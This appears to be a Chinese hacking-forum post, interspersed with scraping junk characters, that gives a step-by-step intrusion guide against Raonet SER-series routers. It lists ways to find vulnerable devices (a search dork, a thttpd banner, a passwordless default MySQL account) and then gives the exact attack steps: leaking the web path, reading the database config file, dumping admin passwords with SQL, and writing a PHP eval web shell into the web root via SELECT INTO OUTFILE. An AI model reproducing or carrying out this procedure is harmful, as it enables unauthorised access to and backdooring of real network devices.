寻找存在漏洞的路由器方法:
6 s" q: N9 G5 @/ w% n, k8 R4 n* c. J- ~& C9 T/ M3 o
1:google搜索'Raonet Subscriber Ethernet Router'
0 X! `4 L& t8 L; G+ s0 g8 }( @3 j, P3 R
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
, {+ N, T, @3 E' h2 m
+ f& f# w6 ^1 u E3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。8 u I% a' S8 d; a/ T2 ^0 L z v8 ~
7 N' g! Q5 w! |. _% q
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
; Z/ ]+ r3 ?$ K
6 O' M: t( a" D# ?" R$ Q; o 9 e/ \# f: e$ P; b4 d! }& S- o/ P
4 f% O1 x7 } n+ ~# I# l3 b入侵步骤:* U/ x% E' I( d# {4 k y1 ~
) d I" Z" m/ k$ E5 A- l) \- A
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php) S. G- M3 b+ L a- F
1 Y+ ?. w* r U, w, w. N2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc& F4 f* s' v5 ]: p
3:得到密码后连接,查看GUI管理密码:
1 ], }( ~/ `* K$ N* Y3 tuse ser_500/ f, h8 s- y E/ ^
select id,passwd from user;
" }' t0 D& ~/ e! Z C; u4:通过数据库写入webshell,执行命令:
5 P5 ]. [* s* Z* C9 ^. ^% Tuse mysql;- m2 B- p: W# G5 t# ?+ q
create table ok(cmd TEXT);
, |" O Z: s% l; w8 ~) o5 Uinsert into ok values("<?php @eval($_POST[cmd])?>");" j Z- `$ R7 V u7 b6 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
- T* n- H, s' W$ q- v: U- Y8 Q5 xdrop table ok;, e1 Y& M5 v2 T" a& t' [) C' I
, i) v2 s( j) P) x2 R
5:连接后门shell.php # a3 V8 B. O& r( s6 N: b+ Q* C
' k3 O2 l+ Z: w% f. {8 Y J3 E6. 搞定!' K7 n! Y7 M+ g3 Y8 ^. C4 E
0 _6 E7 s0 E! f0 Y6 L
|